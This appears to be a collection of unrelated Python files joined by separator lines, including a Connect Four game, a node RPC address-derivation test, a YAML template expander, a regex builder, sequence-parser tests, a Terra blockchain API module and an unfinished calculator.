.. versionadded:: 0.24.0
%(verbose)s
Returns
-------
epochs : instance of Epochs
Segmented data.
Notes
-----
.. versionadded:: 0.20
"""
events = make_fixed_length_events(raw, id=id, duration=duration,
overlap=overlap)
delta = 1. / raw.info['sfreq']
return Epochs(raw, events, event_id=[id], tmin=0, tmax=duration - delta,
baseline=None, preload=preload,
reject_by_annotation=reject_by_annotation, proj=proj,
verbose=verbose)
|
import os
for root, dirs, files in os.walk('.'):
for name in files:
if name.endswith('.py'):
continue
klass, weapon, desc = name.split('-')
if klass[-1] not in ('0', '5'):
new_klass = klass + '0'
else:
new_klass = klass
new_name = name.replace(klass, new_klass)
full_name = os.path.join(root, name)
print(full_name)
new_name = full_name.replace(name, new_name)
print(new_name)
os.rename(full_name, new_name)
|
"""game.py - module for playing a game on the game board."""
from typing import Union
from connect_four.game_board import GameBoard
from connect_four.game_board import GamePiece
class Game:
"""Game - manage the playing of a Connect Four game."""
def __init__(self) -> None:
"""Initialize a new game."""
self.game_board = GameBoard()
self.player_one = GamePiece.RED
self.player_two = GamePiece.YELLOW
self.winner: Union[GamePiece, None] = None
def play(self) -> None:
"""Play a game that has been setup."""
row_idx = 0
active_player = self.player_one
self.game_board.display()
col_idx = int(input("Pick a column:"))
self.game_board.play(active_player, col_idx)
while not self.game_board.check_win(active_player, row_idx, col_idx):
if active_player == GamePiece.RED:
active_player = GamePiece.YELLOW
else:
active_player = GamePiece.RED
print("-" * 40)
self.game_board.display()
col_idx = int(input("Pick a column:"))
row_idx = self.game_board.play(active_player, col_idx)
self.winner = active_player
print("-" * 40)
self.game_board.display()
print(f"Congratulations, {self.winner}!")
def player_won(self, piece: GamePiece) -> bool:
"""Return true if the specified piece is the game winner."""
return self.winner == piece
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the deriveaddresses rpc call."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.descriptors import descsum_create
from test_framework.util import assert_equal, assert_raises_rpc_error
class DeriveaddressesTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.supports_cli = 1
def run_test(self):
assert_raises_rpc_error(-5, "Invalid descriptor", self.nodes[0].deriveaddresses, "a")
descriptor = "wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)#t6wfjs64"
address = "rsir1qjqmxmkpmxt80xz4y3746zgt0q3u3ferr0c8362"
assert_equal(self.nodes[0].deriveaddresses(descriptor), [address])
descriptor = descriptor[:-9]
assert_raises_rpc_error(-5, "Invalid descriptor", self.nodes[0].deriveaddresses, descriptor)
descriptor_pubkey = "wpkh(tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/0)#s9ga3alw"
address = "rsir1qjqmxmkpmxt80xz4y3746zgt0q3u3ferr0c8362"
assert_equal(self.nodes[0].deriveaddresses(descriptor_pubkey), [address])
ranged_descriptor = "wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)#kft60nuy"
assert_equal(self.nodes[0].deriveaddresses(ranged_descriptor, [1, 2]), ["rsir1qhku5rq7jz8ulufe2y6fkcpnlvpsta7rqtc0r66", "rsir1qpgptk2gvshyl0s9lqshsmx932l9ccsv2ye3927"])
assert_equal(self.nodes[0].deriveaddresses(ranged_descriptor, 2), [address, "rsir1qhku5rq7jz8ulufe2y6fkcpnlvpsta7rqtc0r66", "rsir1qpgptk2gvshyl0s9lqshsmx932l9ccsv2ye3927"])
assert_raises_rpc_error(-8, "Range should not be specified for an un-ranged descriptor", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)"), [0, 2])
assert_raises_rpc_error(-8, "Range must be specified for a ranged descriptor", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"))
assert_raises_rpc_error(-8, "End of range is too high", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), 10000000000)
assert_raises_rpc_error(-8, "Range is too large", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [1000000000, 2000000000])
assert_raises_rpc_error(-8, "Range specified as [begin,end] must not have begin after end", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [2, 0])
assert_raises_rpc_error(-8, "Range should be greater or equal than 0", self.nodes[0].deriveaddresses, descsum_create("wpkh(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/*)"), [-1, 0])
combo_descriptor = descsum_create("combo(tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/1/0)")
assert_equal(self.nodes[0].deriveaddresses(combo_descriptor), ["mtfUoUax9L4tzXARpw1oTGxWyoogp52KhJ", "mtfUoUax9L4tzXARpw1oTGxWyoogp52KhJ", address, "QhH14HY4FwMbpAN3SRRJKixiC8PdFg8qpP"])
hardened_without_privkey_descriptor = descsum_create("wpkh(tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1'/1/0)")
assert_raises_rpc_error(-5, "Cannot derive script without private keys", self.nodes[0].deriveaddresses, hardened_without_privkey_descriptor)
bare_multisig_descriptor = descsum_create("multi(1,tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/0,tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/1/1)")
assert_raises_rpc_error(-5, "Descriptor does not have a corresponding address", self.nodes[0].deriveaddresses, bare_multisig_descriptor)
if __name__ == '__main__':
DeriveaddressesTest().main()
|
#!/usr/bin/env python3
import urllib.request
import yaml
import sys
#This program takes in as an argument a reference to a yaml file. It will then scan through the file looking for
# #particular tags, and then upon finding those tags, replacing them with text from other yaml files of a given address
#This function accepts a file path to a yaml file and returns the contents of the yaml file as a dictionary
def input_from_yaml(inputfile):
try:
with open(inputfile) as file:
yaml_template = yaml.load(file, Loader=yaml.FullLoader)
return yaml_template
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
#This function accepts a url for a yaml file, and returns the contents of the yaml file in a python dictionary
def get_yaml_from_url(yaml_url):
try:
with urllib.request.urlopen(yaml_url) as urlfile:
yaml_resource_file = yaml.load(urlfile, Loader=yaml.FullLoader)
return yaml_resource_file
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
#This function accepts a python dictionary and outputs a yaml file to stdout.
def output_to_yaml():
try:
yaml.safe_dump(outputyaml, sys.stdout, allow_unicode=True, default_flow_style=False, sort_keys=False)
except Exception as e:
sys.stderr.write(str(e))
sys.exit()
#This function takes in a strongly nested dictionary, then recursively traverses it looking for certain tags. It then replaces the tags with text from other files and then returns a new file.
def create_new_yaml(nested_dict):
emptydict = {}
for key, value in nested_dict.items():
keystring = str(key)
if keystring.startswith('X-replace')==False:
if type(value) != dict:
emptydict[key] = value
if type(value) == dict:
recursivevalue = create_new_yaml(value)
if recursivevalue != "schema replaced" and recursivevalue !="enum replaced":
emptydict[key] = recursivevalue
if recursivevalue == "schema replaced":
emptydict[key]=storagedict
if recursivevalue =="enum replaced":
emptydict['enum'] = secondstorage.get('enum')
if keystring.startswith('X-replace'):
if keystring == 'X-replace-enum-list':
yaml_url=str(value.get('enum-file-ref'))
if yaml_url.startswith('http') == False:
yaml_obj = input_from_yaml(yaml_url)
if yaml_url.startswith('http'):
yaml_obj = get_yaml_from_url(yaml_url)
replaced_section = []
for enumkey, enumvalue in yaml_obj.items():
replaced_section.append(enumkey)
secondstorage['enum'] = replaced_section
return "enum replaced"
if keystring == 'X-replace-schema':
yaml_url_list=(value.get('schema-file-ref'))
for schemakey, schemavalue in emptydict.items():
storagedict[schemakey] = schemavalue
for thisurl in yaml_url_list:
yaml_url = str(thisurl)
if yaml_url.startswith('http') == False:
yaml_obj = input_from_yaml(yaml_url)
if yaml_url.startswith('http'):
yaml_obj = get_yaml_from_url(yaml_url)
internalcall = create_new_yaml(yaml_obj)
for tempkey, tempvalue in internalcall.items():
storagedict[tempkey] = tempvalue
return "schema replaced"
return emptydict
# Running this python file as a script
# python3 -m general_schema_template_transformer <input_file>
if __name__ == "__main__":
#Makes sure that there is at least one argument being passed to this program. If there is, the argument is assigned to a variable. input_from_yaml is then called with this variable as a parameter.
try:
input_file = sys.argv[1]
except IndexError as e:
msg = "Must pass in exactly 1 argument: the name of an existing file"
sys.exit(msg)
yaml_template = input_from_yaml(input_file)
storagedict = {} #Instantiates a global dictionary. This provides temporary storage of dictionary elements to be used with create_new_yaml function
secondstorage = {} #Instantiates a second global dictionary. This is only used for collecting enum lists to use at earlier loops through the recursive function
outputyaml = create_new_yaml(yaml_template)
output_to_yaml()
|
import re
import copy
from typing import Union, Optional, List
from .exceptions import BadStatement
from .aux_classes import Stack, StackFrame
### Grouping
from .regex_classes import SetOfLiterals
from .regex_classes import Capture, Group
### Quatifiers
from .regex_classes import OptionalQ
from .regex_classes import zeroOrMore, zeroOrMoreLazy
from .regex_classes import oneOrMore, oneOrMoreLazy
from .regex_classes import Between, betweenLazy
from .regex_classes import atLeast, upTo
from .regex_classes import Exactly
### Others
from .regex_classes import Root
### Literals
from .regex_classes import anyChar, whitespaceChar
from .regex_classes import nonWhitespaceChar, Digit
from .regex_classes import nonDigit, Word, nonWord
from .regex_classes import Char, rawChar, String, rawString
from .regex_classes import Newline, carriageReturn, Tab, Space
from .regex_classes import Range, anythingButRange
from .regex_classes import anyOfChars, anythingButChars
class ExpressiveRegex:
__slosts__ = ('_expression', '_hasDefineStart', '_hasDefineEnd', '_flags', '_stack')
def __init__(self, mutable=False):
self._expression = ""
self._hasDefineStart = False
self._hasDefineEnd = False
self._flags = {
# TODO: add the other flags
'i': False, # case-insensitive matching
'm': False, # multiline
}
self._stack = Stack()
self._stack.push(StackFrame(Root))
self._mutable = mutable
@property
def mutable(self):
return self._mutable
@property
def _currentFrame(self): # pragma: no cover
return self._stack.top()
def _applyQuatifier(self, element): # pragma: no cover
if self._currentFrame.quantifier:
wrap = self._currentFrame.get_qinstance(element)
self._currentFrame.quantifier = None
self._currentFrame._quantifier_args = ()
self._currentFrame._quantifier_kwargs = {}
else:
wrap = element
return wrap
def _matchElement(self, cls, *args, **kwargs): # pragma: no cover
element = cls(*args, **kwargs)
wrap = self._applyQuatifier(element)
self._currentFrame.elements.append(wrap)
return self
def _instance(self): # pragma: no cover
if self._mutable:
return self
obj = copy.deepcopy(self)
obj._expression = ""
return obj
def _quantifier(self, qclass, *args, **kwargs):
if self._currentFrame.quantifier is not None:
raise BadStatement(f'cannot quantify regular expression with "{str(qclass)}" because it\'s already being quantified with "{self._currentFrame.quantifier}"')
if self._currentFrame.type is SetOfLiterals:
raise BadStatement('Quatifiers aren\'t admited inside "setOfLiterals".')
instance = self._instance()
instance._currentFrame.quantifier = qclass
instance._currentFrame._quantifier_args = args
instance._currentFrame._quantifier_kwargs = kwargs
return instance
def _group(self, gclass):
instance = self._instance()
newFrame = StackFrame(gclass)
instance._stack.push(newFrame)
return instance
### Quantifiers
@property
def optional(self):
return self._quantifier(OptionalQ)
@property
def zeroOrMore(self):
return self._quantifier(zeroOrMore)
@property
def zeroOrMoreLazy(self):
return self._quantifier(zeroOrMoreLazy)
@property
def oneOrMore(self):
return self._quantifier(oneOrMore)
@property
def oneOrMoreLazy(self):
return self._quantifier(oneOrMoreLazy)
def exactly(self, a: int):
return self._quantifier(Exactly, a)
def between(self, a: int, b: int):
return self._quantifier(Between, a, b)
def betweenLazy(self, a: int, b: int):
return self._quantifier(betweenLazy, a, b)
def atLeast(self, a: int):
return self._quantifier(atLeast, a)
def upTo(self, b: int):
return self._quantifier(upTo, b)
### Grouping
def end(self):
if len(self._stack) == 1:
raise BadStatement("Cannot call end while building the root expression.")
instance = self._instance()
frame = instance._stack.pop()
wrap = instance._applyQuatifier(frame.get_instance())
instance._currentFrame.append(wrap)
return instance
@property
def setOfLiterals(self):
return self._group(SetOfLiterals)
@property
def capture(self):
return self._group(Capture)
@property
def group(self):
return self._group(Group)
### Literals
@property
def anyChar(self):
instance = self._instance()
return instance._matchElement(anyChar)
@property
def whitespaceChar(self):
instance = self._instance()
return instance._matchElement(whitespaceChar)
@property
def nonWhitespaceChar(self):
instance = self._instance()
return instance._matchElement(nonWhitespaceChar)
@property
def digit(self):
instance = self._instance()
return instance._matchElement(Digit)
@property
def nonDigit(self):
instance = self._instance()
return instance._matchElement(nonDigit)
@property
def word(self):
instance = self._instance()
return instance._matchElement(Word)
@property
def nonWord(self):
instance = self._instance()
return instance._matchElement(nonWord)
@property
def newline(self):
instance = self._instance()
return instance._matchElement(Newline)
@property
def carriageReturn(self):
instance = self._instance()
return instance._matchElement(carriageReturn)
@property
def tab(self):
instance = self._instance()
return instance._matchElement(Tab)
@property
def space(self):
instance = self._instance()
return instance._matchElement(Space)
def char(self, value):
instance = self._instance()
return instance._matchElement(Char, value)
def rawChar(self, value):
instance = self._instance()
return instance._matchElement(rawChar, value)
def string(self, value):
instance = self._instance()
return instance._matchElement(String, value)
def rawString(self, value):
instance = self._instance()
return instance._matchElement(rawString, value)
def range(self, begin: Union[str, int], end: Union[str, int],
exclude: Optional[Union[List[Union[str, int]], str]]=None):
instance = self._instance()
return instance._matchElement(Range, begin, end, exclude)
def anythingButRange(self, begin: Union[str, int], end: Union[str, int],
exclude: Optional[Union[List[Union[str, int]], str]]=None):
instance = self._instance()
return instance._matchElement(anythingButRange, begin, end, exclude)
def anyOfChars(self, value):
instance = self._instance()
return instance._matchElement(anyOfChars, value)
def anythingButChars(self, value):
instance = self._instance()
return instance._matchElement(anythingButChars, value)
### Build Expression
def toRegexString(self)->String:
txt = 'Cannot compute the value of a not yet fully specified regex object.\n'
txt += f'(Try adding a .end() call to match the "{str(self._currentFrame.type)}")\n'
assert len(self._stack) == 1, txt
if not self._mutable and self._expression:
return self._expression
exp = self._currentFrame.get_instance().value
self._expression = exp
return exp
def toRegex(self):
exp = self.toRegexString()
return re.compile(exp)
|
from rest_framework.settings import APISettings
from django.conf import settings
import os
USER_SETTINGS = getattr(settings, 'REST_CAPTCHA', None)
FONT_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'fonts/Vera.ttf')
DEFAULTS = {
'CAPTCHA_CACHE': 'default',
'CAPTCHA_TIMEOUT': 300, # 5 minuts
'CAPTCHA_CACHE_KEY': 'rest_captcha_{key}.{version}',
'CAPTCHA_KEY': 'captcha_key',
'CAPTCHA_IMAGE': 'captcha_image',
'CAPTCHA_LENGTH': 4,
'CAPTCHA_FONT_PATH': FONT_PATH,
'CAPTCHA_FONT_SIZE': 22,
'CAPTCHA_IMAGE_SIZE': (90, 40),
'CAPTCHA_LETTER_ROTATION': (-35, 35),
'CAPTCHA_FOREGROUND_COLOR': '#001100',
'CAPTCHA_BACKGROUND_COLOR': '#ffffff',
'FILTER_FUNCTION': 'rest_captcha.captcha.filter_default',
'NOISE_FUNCTION': 'rest_captcha.captcha.noise_default',
# for tests access: MASTER_CAPTCHA: {'secret_key: secret_value'}
'MASTER_CAPTCHA': {}
}
# List of settings that may be in string import notation.
IMPORT_STRINGS = ('FILTER_FUNCTION', 'NOISE_FUNCTION')
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRINGS)
|
# write tests for parsers
from seqparser import (
FastaParser,
FastqParser)
def test_freebie_parser_1():
"""
This one is a freebie
DO NOT MODIFY THIS FUNCTION
"""
assert True
def test_freebie_parser_2():
"""
This too is a freebie
DO NOT MODIFY THIS FUNCTION
"""
assert 1 != 2
def test_FastaParser():
"""
Write your unit test for your FastaParser
class here. You should generate an instance of
your FastaParser class and assert that it properly
reads in the example Fasta File.
"""
head0 = '>seq0' #define headers and sequences for the first and last two sequences in test.fa
seq0 = 'TGATTGAATCTTTTGAGGGTCACGGCCCGGAAGCCAGAATTTCGGGGTCCTCTGTGGATATTAATCGAGCCCACACGGTGTGAGTTCAGCGGCCCCCGCA'
head1 = '>seq1'
seq1 = 'TCCGCCCGCTGTGCTGACGAGACTAGCAGGGAAATAAATAGAGGGTTTAGTTATACTCAGTAGGCAGTTCGATGGCTTATATCTAACTTCTTATTCCGAT'
head98 = '>seq98'
seq98 = 'CGAGCGAGAAACGCGCTAACTAGCAACCGGAACAACAATGCTGGGTTGAATTTGATTCGCACCCGACGATCACTAGAGAGTTTATCTGGGACTCCGGGAC'
head99 = '>seq99'
seq99 = 'CAAACCGGCGATGCGGGTACTCCCTACAAGTTGGACTCCGCAGCGAACGCCGCAGGGGCCATTATACGGCGGTCTTGGCGGCGTCGACCAGGCCGGTCCA'
fasta = '../project1/data/test.fa'
out = FastaParser(fasta)
out_list = [tup for tup in out] #convert output into a list of tuples
assert out_list[0] == (head0,seq0) #check that the headers and sequences are equivalent
assert out_list[1] == (head1,seq1)
assert out_list[98] == (head98,seq98)
assert out_list[99] == (head99,seq99)
def test_FastqParser():
"""
Write your unit test for your FastqParser
class here. You should generate an instance of
your FastqParser class and assert that it properly
reads in the example Fastq File.
"""
head0 = '@seq0' #define headers and sequences for the first and last two sequences in test.fq
seq0 = 'TGTGGTCGTATAGTTATTGTCATAAATTACACAGAATCGCGATTCTCCGCGTCCACCAATCTTAGTGCACCACAGCATCGACCCGATTTATGACGCTGAG'
qual0 = '''*540($=*,=.062565,2>'487')!:&&6=,6,*7>:&132&83*8(58&59>'8!;28<94,0*;*.94**:9+7"94(>7='(!5"2/!%"4#32='''
head1 = '@seq1'
seq1 = 'CCCCGGACGACTGATCCCGATAGAGCTCACTCTTCGAGGCAAGCAGACCCATATCGTCCTGCTGGCAACGCTATCCGGGTGCGAGTAAATCGAAACCTCG'
qual1 = ''''(<#/0$5&!$+,:=%7=50--1;'(-7;0>=$(05*9,,:%0!<),%646<8#%"."-'*-0:.+*&$5!'8)(%3*+9/&/%=363*,6$20($97,"'''
head98 = '@seq98'
seq98 = 'AACCTGCCCGTAGCCTTTAGGTAGCCCGTCTACATGTCCTCCAGTACAGTGGAAGCTCCTACATCAACTGATCAAATAACATCGCAGCACTATATGTCAC'
qual98 = '''39$$8'':7:0;0%/7$89-<3',:)1"0'=2'!#5><>+6/=99#>8-$76(6$2'+=;$-))753#99,=+4+1=:5.08*$*:4=,>)/)':8,<48'''
head99 = '@seq99'
seq99 = 'CCGAGTTTTGTAGTGGGCTCAACTGAAATCCTATTCTTAGACGATTGGTCATAAAACCCTTTCACTGTACGGACGTAGACCCTGCTCCGTCTTCCAGCAG'
qual99 = '''2$7)*5:"=+++!:.=>!5>79)8!566$!3*/4$=4.%=//;900$9)!%)4%$=0":02"0=!0#/>+*1$1$39!.8+9<'1$*1$321&<'&9,)2'''
fastq = '../project1/data/test.fq'
out = FastqParser(fastq)
out_list = [tup for tup in out] #convert output into a list of tuples
assert out_list[0] == (head0,seq0,qual0) #check that the headers, sequences, and qualities are equivalent
assert out_list[1] == (head1,seq1,qual1)
assert out_list[98] == (head98,seq98,qual98)
assert out_list[99] == (head99,seq99,qual99)
|
"""Terra Money FCD model"""
__docformat__ = "numpy"
import logging
import textwrap
from datetime import datetime
from typing import Any, Tuple, Dict
import pandas as pd
import requests
from gamestonk_terminal.cryptocurrency.dataframe_helpers import (
denominate_number,
prettify_column_names,
replace_unicode,
)
from gamestonk_terminal.decorators import log_start_end
logger = logging.getLogger(__name__)
GOV_COLUMNS = [
"submitTime",
"id",
"depositEndTime",
"status",
"type",
"title",
"Yes",
"No",
]
GOV_STATUSES = ["voting", "deposit", "passed", "rejected", "all"]
VALIDATORS_COLUMNS = [
"validatorName",
"tokensAmount",
"votingPower",
"commissionRate",
"status",
"uptime",
]
@log_start_end(log=logger)
def _make_request(endpoint: str) -> dict:
"""Helper method handles terra fcd api requests. [Source: https://fcd.terra.dev/v1]
Parameters
----------
endpoint: str
endpoint url
Returns
-------
dict:
dictionary with response data
"""
url = f"https://fcd.terra.dev/v1/{endpoint}"
response = requests.get(
url, headers={"Accept": "application/json", "User-Agent": "GST"}
)
if not 200 <= response.status_code < 300:
raise Exception(f"fcd terra api exception: {response.text}")
try:
return response.json()
except Exception as e:
raise ValueError(f"Invalid Response: {response.text}") from e
@log_start_end(log=logger)
def _adjust_delegation_info(delegation: dict) -> dict:
"""Helper method which removes redundant fields from delegation info dictionary,
and denominate value fields. [Source: https://fcd.terra.dev/v1]
Parameters
----------
delegation:
dictionary object with delegation data e.g.
Returns
-------
dict
adjusted dictionary with delegation data
"""
delegation_info = {}
for key, value in delegation.items():
if key in ["amountDelegated", "totalReward"]:
delegation_info[key] = denominate_number(value)
elif key in ["validatorAddress", "rewards"]:
continue
else:
delegation_info[key] = value
return delegation_info
@log_start_end(log=logger)
def get_staking_account_info(address: str = "") -> Tuple[pd.DataFrame, str]:
"""Get staking info for provided terra account [Source: https://fcd.terra.dev/swagger]
Parameters
----------
address: str
terra blockchain address e.g. terra1jvwelvs7rdk6j3mqdztq5tya99w8lxk6l9hcqg
Returns
-------
Tuple[pd.DataFrame, str]:
luna delegations and summary report for given address
"""
response = _make_request(f"staking/{address}")
results: Dict[str, Any] = {"myDelegations": []}
for field in ["availableLuna", "delegationTotal"]:
results[field] = denominate_number(response.get(field, 0))
my_delegations = response.get("myDelegations")
if my_delegations:
for delegation in my_delegations:
validator = _adjust_delegation_info(delegation)
results["myDelegations"].append(validator)
df = pd.DataFrame(results["myDelegations"])
try:
df["validatorName"] = df["validatorName"].apply(lambda x: replace_unicode(x))
df.columns = prettify_column_names(list(df.columns))
except KeyError:
df = pd.DataFrame()
results["totalRewards"] = denominate_number(
response.get("rewards", {}).get("total", 0)
)
report = f"""Overview:
Address: {address}
Available Luna: {results['availableLuna']}
Delegated Luna: {results['delegationTotal']}
Total Rewards: {results['totalRewards']}\n"""
report += "\nDelegations: " if not df.empty else "\nNo delegations found\n"
return df, report
@log_start_end(log=logger)
def get_validators() -> pd.DataFrame:
"""Get information about terra validators [Source: https://fcd.terra.dev/swagger]
Returns
-------
pd.DataFrame
terra validators details
"""
response = _make_request("staking")["validators"]
results = []
for validator in response:
results.append(
{
"accountAddress": validator["accountAddress"],
"validatorName": validator["description"].get("moniker"),
"tokensAmount": denominate_number(validator["tokens"]),
"votingPower": round(
(float(validator["votingPower"].get("weight")) * 100), 2
),
"commissionRate": round(
(float(validator["commissionInfo"].get("rate", 0)) * 100), 2
),
"status": validator["status"],
"uptime": round((float(validator.get("upTime", 0)) * 100), 2),
}
)
return pd.DataFrame(results).sort_values(by="votingPower")
@log_start_end(log=logger)
def get_proposals(status: str = "") -> pd.DataFrame:
"""Get terra blockchain governance proposals list [Source: https://fcd.terra.dev/swagger]
Parameters
----------
status: str
status of proposal, one from list: ['Voting','Deposit','Passed','Rejected']
Returns
-------
pd.DataFrame
Terra blockchain governance proposals list
"""
statuses = ["Voting", "Deposit", "Passed", "Rejected"]
response = _make_request("gov/proposals")["proposals"]
results = []
votes_options = ["Yes", "Abstain", "No", "NoWithVeto"]
for proposal in response:
deposit = proposal.pop("deposit")
proposal["depositEndTime"] = deposit.get("depositEndTime")
vote = proposal.pop("vote")
proposal.pop("proposer")
for opt in votes_options:
proposal[opt] = vote["count"].get(opt)
results.append(proposal)
columns = [
"id",
"submitTime",
"depositEndTime",
"status",
"type",
"title",
"Yes",
"No",
"Abstain",
"NoWithVeto",
]
df = pd.DataFrame(results)[columns]
df[["id", "Yes", "No", "Abstain", "NoWithVeto"]] = df[
["id", "Yes", "No", "Abstain", "NoWithVeto"]
].astype(int, errors="ignore")
df["title"] = df["title"].apply(
lambda x: "\n".join(textwrap.wrap(x, width=40)) if isinstance(x, str) else x
)
for col in ["submitTime", "depositEndTime"]:
df[col] = df[col].apply(lambda x: pd.to_datetime(x).strftime("%Y-%m-%d %H:%M"))
if status.title() in statuses:
df = df[df["status"] == status.title()]
return df
@log_start_end(log=logger)
def get_account_growth(cumulative: bool = True) -> pd.DataFrame:
"""Get terra blockchain account growth history [Source: https://fcd.terra.dev/swagger]
Parameters
----------
cumulative: bool
distinguish between periodical and cumulative account growth data
Returns
-------
pd.DataFrame
historical data of accounts growth
"""
response = _make_request("dashboard/account_growth")
kind = "cumulative" if cumulative else "periodic"
df = pd.DataFrame(response[kind])
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df = df[["date", "totalAccountCount", "activeAccountCount"]]
df.columns = ["date", "Total accounts", "Active accounts"]
return df
@log_start_end(log=logger)
def get_staking_ratio_history():
"""Get terra blockchain staking ratio history [Source: https://fcd.terra.dev/swagger]
Returns
-------
pd.DataFrame
historical staking ratio
"""
response = _make_request("dashboard/staking_ratio")
df = pd.DataFrame(response)
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df["stakingRatio"] = df["stakingRatio"].apply(lambda x: round(float(x) * 100, 2))
return df[["date", "stakingRatio"]]
@log_start_end(log=logger)
def get_staking_returns_history():
"""Get terra blockchain staking returns history [Source: https://fcd.terra.dev/v1]
Returns
-------
pd.DataFrame
historical staking returns
"""
response = _make_request("dashboard/staking_return")
df = pd.DataFrame(response)
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df["annualizedReturn"] = df["annualizedReturn"].apply(
lambda x: round(float(x) * 100, 2)
)
return df[["date", "annualizedReturn"]]
|
#!/usr/bin/env python3
"""A simple calculator"""
from get_integer_from_user import get_integer
from get_float_from_user import get_float
from get_positive_number_from_user import get_positive_num
from primality_check import is_prime
from gcd_program import gcd_recursive
from get_integer_in_range import get_int_in_range
# init global variables
global latest_result, arg1, arg2, operator
latest_result = 0.0
arg1 = 0.0
arg2 = 0.0
operator = 'None'
def help_screen():
""" Displays Help Infomation.
How the program works. Accepts no parameters
Returns nothing
"""
print('-' * 60)
print(format('| {0} |', '-^44').format(__doc__))
print('-' * 60)
print(format(' Operation [1]: Addition (x + y) ', '_^60' ))
print(format(' Operation [2]: Subtraction (x - y) ', '_^60'))
print(format(' Operation [3]: Multiplication (x * y) ', '_^60'))
print(format(' Operation [4]: Division (x / y) ', '_^60'))
print(format(' Operation [5]: Exponentiation (x ** y) ', '_^60'))
print(format(' Operation [6]: Floor division (x // y) ', '_^60'))
print(format(' Operation [7]: Modulus division (x % y) ', '_^60'))
print(format(' Operation [8]: Greatest Common Divisor gcd(x,y) ', '_^60'))
print(format(' Operation [9]: Test for Primality. (True/False) ', '_^60'))
print(format(' Operation [10]: Print latest result ', '_^60'))
print(format(' Operation [0]: Help (Displays this help screen) ', '_^60'))
print(format(' Operation [-1]: Exit Calculator', '_^60'))
print('-' * 60)
def menu():
""" Displays Arithmetic Menu Options.
Accepts no parameter
Returns an integer from user
"""
help_screen()
print(format(' Enter Command to Porceed ', '|^60'))
print(format(' [-1]Quit [0]Help ', '|^60'))
print(format(' [1]Add [2]Sub [3]Multiply [4]Divide', '|^60'))
print(format(' [5]Exp [6]Floor [7]Mod [8]gcd [9]pimality ', '|^60' ))
print('-' * 60)
print('Select Operation [-1 - 10]: ')
return get_int_in_range(-1, 10)
def arithmetic_ops():
""" Runs a command loop that allows users to perform simple arithmetic """
# Init
latest_result = 0.0
terminate = False
while not terminate:
op_selection = menu() # Get user's choice
if op_selection == -1: # Terminate Program
terminate = True
elif op_selection == 0: # Help
help_screen()
elif op_selection == 1: # Add
print(format(' ADDITITION (x+y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '+'
print()
latest_result = add_two(arg1, arg2) # Store latest result
print('{0:,} + {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 2: # Subtraction
print(format(' SUBTRACTION (x-y) ', '|^60'))
# Init
